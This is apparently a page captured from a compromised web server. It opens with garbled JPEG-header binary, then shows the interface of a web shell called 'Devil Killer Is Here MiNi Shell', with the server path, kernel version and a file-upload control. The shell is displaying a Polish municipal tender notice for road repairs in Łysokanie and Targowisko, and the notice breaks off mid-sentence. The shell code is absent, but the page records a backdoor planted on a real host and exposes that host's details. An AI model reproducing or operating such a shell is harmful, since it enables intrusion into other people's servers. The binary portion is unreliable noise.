JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251022/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251022/0049077901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi gminnej nr 560263K w miejscowości Łysokanie oraz remont drogi gminnej nr 560253K w miejscowości Targowisko, z podziałem na dwie części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KŁAJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555980</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">655</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłaj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-015</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">122841045</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugk@klaj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.klaj.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi gminnej nr 560263K w miejscowości Łysokanie oraz remont drogi gminnej nr 560253K w miejscowości Targowisko, z podziałem na dwie części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a0d45cc-98e0-4d8c-ab2f-628c3f6fbdb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00490779</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00016808/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Remont drogi gminnej nr 560263K w miejscowości Łysokanie oraz remont drogi gminnej nr 560253K w miejscowości Targowisko, z podziałem na dwie części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6a0d45cc-98e0-4d8c-ab2f-628c3f6fbdb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) w postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.;<br/>2) korzystanie z Platformy e-Zamówienia jest bezpłatne,<br/>3) adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-<br/>Zamówienia): https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-ccd5af87-6e93-4ab2-a864-91ec45590b2b<br/>4) postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj<br/>postępowania/konkursy”);</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">16) wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”;<br/>17) maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza);<br/>18) minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia;<br/>19) w przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy<br/>e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie<br/>internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”;<br/>20) w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy<br/>i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty<br/>elektronicznej na adres e mail: inwestycje@klaj.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w<br/>postępowaniu). Wymagania techniczne i korespodencja elektroniczna szczegółowo zostały uregulowane w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny) uregulowany w treści SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania zamawiający nie przewiduje ograniczeń RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">In.271.30.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont drogi gminnej nr 560263K – od km 0+000-0+763 w miejscowości Łysokanie, który będzie polegał na wykonaniu nawierzchni bitumicznej, długości 763 m. o szerokości 3,5m, z betonu asfaltowego AC11 gr. 5 cm (po zagęszczeniu) dla ruchu KR2, na warstwie wzmacniającej z betonu asfaltowego AC16W w ilości śr.100 kg/m2 po wcześniejszym skropieniu emulsją asfaltową. Wzmocnienie poboczy kruszywem łamanym frakcji 0/31,5 po obu krawędziach nawierzchni szerokości, grubości średnio15 cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.	Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów, i sposobu oceny ofert osobno dla Części I i II.<br/>Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Kryterium 1: Cena „C” – waga punktowa - 60 pkt;<br/>Kryterium 2: Okres gwarancji „G” – waga punktowa - 40 pkt;<br/>1)	ocenie w oparciu o ww. kryteria oceny ofert poddawane są wyłącznie oferty niepodlegające odrzuceniu.<br/>W trakcie oceny ofert, kolejno ocenianym ofertom, zostaną przyznane punkty wg poniższego wzoru:<br/>P = C + G<br/>Suma punktów (P) stanowiąca sumę „Ceny oferty” C i „Okres gwarancji” G wyliczona wg poniższych wzorów:<br/>Kryterium 1: Cena oferty „C” – maksymalnie można otrzymać 60 pkt.:<br/>Ilość punktów w ramach tego kryterium wyliczona będzie w oparciu o poniższy wzór:<br/><br/> Najniższa oferowana cena spośród wszystkich ofert (brutto)<br/>C „Cena oferty” =------------------------------------------------------------------------- x 60 pkt.<br/><br/>Cena oferowana badanej oferty (brutto)<br/><br/>Kryterium 2: Okres gwarancji „G” – maksymalnie można otrzymać 40 pkt.:<br/>	<br/><br/>Kryterium „okres gwarancji” będzie rozpatrywany na podstawie długości okresu gwarancji, zadeklarowanego przez Wykonawcę w Formularzu oferty. Okres gwarancji będzie liczony od daty odbioru końcowego. <br/>Wykonawca może zaproponować okres gwarancji w następujący sposób, tj. 5, 5,5, 6, 6,5 i 7 lat.<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 7 lat,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6,5 roku,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6 lat,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 5,5 roku,<br/>-	oferta Wykonawcy, który zaproponuje najkrótszy okres gwarancji 5 lat,<br/><br/>Zaoferowany przez Wykonawcę okres gwarancji, zostanie uwzględniony w umowie z Wykonawcą. <br/>Punkty w kryterium „okres gwarancji” będą przyznawane w następujący sposób: <br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 7 lat. otrzyma 40 pkt,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6,5 lat. otrzyma 30 pkt<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6 roku otrzyma 20 pkt,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 5,5 roku otrzyma 10 pkt,<br/>-	oferta Wykonawcy, który zaproponuje najkrótszy okres gwarancji 5 lata otrzyma 0 pkt,<br/><br/>Oferta Wykonawcy, który w „Formularzu oferty” nie poda okresu gwarancji lub poda okres gwarancji krótszy od najkrótszego możliwego okresu tj. poniżej 5 lat, zostanie odrzucona, zgodnie z art. 226 p.z.p.<br/>Następnie punkty uzyskane w Kryterium Cena (C) oraz gwarancji (G) zostaną zsumowane, zgodnie z poniższym wzorem:<br/>P = C + G<br/>gdzie:<br/>P – łączna ilość punktów uzyskanych za ofertę niepodlegającą odrzuceniu <br/>C – ilość punktów uzyskanych w kryterium cena <br/>G – ilość punktów uzyskanych w kryterium okres gwarancji <br/>Za najwyżej ocenioną zostanie uznana oferta, która uzyskała najwyższą liczbę punktów – sumę punktów przyznanych w kryterium „C” + „G” w oparciu o podane w ogłoszeniu o zamówieniu i niniejszej SWZ kryteria oceny oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Remont drogi gminnej nr 560253K – od km 0+000-0+371 w miejscowości Targowisko, który będzie polegał na wykonaniu nawierzchni bitumicznej, długości 371 m. o zmiennej szerokości, z betonu asfaltowego AC11 gr. 6 cm (po zagęszczeniu), na warstwie wzmacniającej z betonu asfaltowego AC16W grubości zmiennej 0- 12 cm, po wcześniejszym skropieniu emulsją asfaltową. W miejscach prze-łomów remont polegał będzie na wymianie podbudowy jezdni kruszywem łamanym oraz lokalne uzupeł-nienie i wzmocnienie podbudowy na krawędziach jezdni betonem asfaltowym o gr. 10cm.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja stanowiąca załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.	Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów, i sposobu oceny ofert osobno dla Części I i II.<br/>Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Kryterium 1: Cena „C” – waga punktowa - 60 pkt;<br/>Kryterium 2: Okres gwarancji „G” – waga punktowa - 40 pkt;<br/>1)	ocenie w oparciu o ww. kryteria oceny ofert poddawane są wyłącznie oferty niepodlegające odrzuceniu.<br/>W trakcie oceny ofert, kolejno ocenianym ofertom, zostaną przyznane punkty wg poniższego wzoru:<br/>P = C + G<br/>Suma punktów (P) stanowiąca sumę „Ceny oferty” C i „Okres gwarancji” G wyliczona wg poniższych wzorów:<br/>Kryterium 1: Cena oferty „C” – maksymalnie można otrzymać 60 pkt.:<br/>Ilość punktów w ramach tego kryterium wyliczona będzie w oparciu o poniższy wzór:<br/><br/> Najniższa oferowana cena spośród wszystkich ofert (brutto)<br/>C „Cena oferty” =------------------------------------------------------------------------- x 60 pkt.<br/><br/>Cena oferowana badanej oferty (brutto)<br/><br/>Kryterium 2: Okres gwarancji „G” – maksymalnie można otrzymać 40 pkt.:<br/>	<br/><br/>Kryterium „okres gwarancji” będzie rozpatrywany na podstawie długości okresu gwarancji, zadeklarowanego przez Wykonawcę w Formularzu oferty. Okres gwarancji będzie liczony od daty odbioru końcowego. <br/>Wykonawca może zaproponować okres gwarancji w następujący sposób, tj. 5, 5,5, 6, 6,5 i 7 lat.<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 7 lat,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6,5 roku,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6 lat,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 5,5 roku,<br/>-	oferta Wykonawcy, który zaproponuje najkrótszy okres gwarancji 5 lat,<br/><br/>Zaoferowany przez Wykonawcę okres gwarancji, zostanie uwzględniony w umowie z Wykonawcą. <br/>Punkty w kryterium „okres gwarancji” będą przyznawane w następujący sposób: <br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 7 lat. otrzyma 40 pkt,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6,5 lat. otrzyma 30 pkt<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 6 roku otrzyma 20 pkt,<br/>-	oferta Wykonawcy, który zaproponuje okres gwarancji 5,5 roku otrzyma 10 pkt,<br/>-	oferta Wykonawcy, który zaproponuje najkrótszy okres gwarancji 5 lata otrzyma 0 pkt,<br/><br/>Oferta Wykonawcy, który w „Formularzu oferty” nie poda okresu gwarancji lub poda okres gwarancji krótszy od najkrótszego możliwego okresu tj. poniżej 5 lat, zostanie odrzucona, zgodnie z art. 226 p.z.p.<br/>Następnie punkty uzyskane w Kryterium Cena (C) oraz gwarancji (G) zostaną zsumowane, zgodnie z poniższym wzorem:<br/>P = C + G<br/>gdzie:<br/>P – łączna ilość punktów uzyskanych za ofertę niepodlegającą odrzuceniu <br/>C – ilość punktów uzyskanych w kryterium cena <br/>G – ilość punktów uzyskanych w kryterium okres gwarancji <br/>Za najwyżej ocenioną zostanie uznana oferta, która uzyskała najwyższą liczbę punktów – sumę punktów przyznanych w kryterium „C” + „G” w oparciu o podane w ogłoszeniu o zamówieniu i niniejszej SWZ kryteria oceny oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.<br/>2)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.<br/>3)	sytuacja ekonomiczna lub finansowej,<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej Zamawiający będzie żądać, podmiotowych środków dowodowych w postaci: <br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną 500 000 zł, łącznie dla trzech części, w przypadku wykonawcy ubiegającego się o udzielenie zamówienia tylko dla jednej części powyższy warunek wykaże następująco: Ubezpieczenie OC na sumę gwarancyjną 300 000 zł, w przypadku ubiegania się o dwie części – 400 000 zł.<br/>4)	zdolność techniczna i zawodowa.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający, w zależności od charakteru, znaczenia, przeznaczenia lub zakresu robót budowlanych, dostaw lub usług, żąda następujących podmiotowych środków dowodowych:<br/>a)	wykazu robót budowlanych wykonanych (zał. nr 5 do SWZ) nie wcześniej niż <br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlanej w postaci co najmniej: <br/>Część I: jednej roboty budowlanej odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty <br/>o wartości minimum 250 000 zł brutto,<br/>Część II: jednej roboty budowlanej odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty 